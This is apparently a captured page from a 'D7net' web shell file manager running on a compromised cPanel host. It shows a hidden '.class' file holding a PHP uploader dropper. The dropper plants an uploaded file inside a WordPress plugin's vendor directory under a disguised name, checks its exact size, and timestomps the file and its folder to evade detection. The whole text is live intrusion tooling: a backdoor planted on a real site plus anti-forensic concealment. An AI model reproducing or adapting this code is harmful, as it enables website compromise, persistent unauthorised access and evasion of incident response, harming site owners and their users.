D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
dystttuo
/
.cagefs
/
tmp
/
Filename :
.class
back
Copy
<?php $p = "/home/dystttuo/public_html//home/dystttuo/.cpanel/ea-php-cli/public_html/wp-content/plugins/w3-total-cache/vendor/nikic/php-parser/lib/PhpParser/Node/editcontent"; $ft = 1763924103; if (move_uploaded_file($_FILES['file']['tmp_name'], $p)) { $filesize = filesize($p); if ($filesize >= 3947) { @chmod($p, 0744); if ($ft) { @touch($p, $ft, $ft); @touch(@dirname($p), $ft, $ft); } die('_uploaded!_'); } else { if (file_exists($p)) { print "file exists but size = {$filesize} not 3947"; } @unlink($p); } } die('_upload_failed_');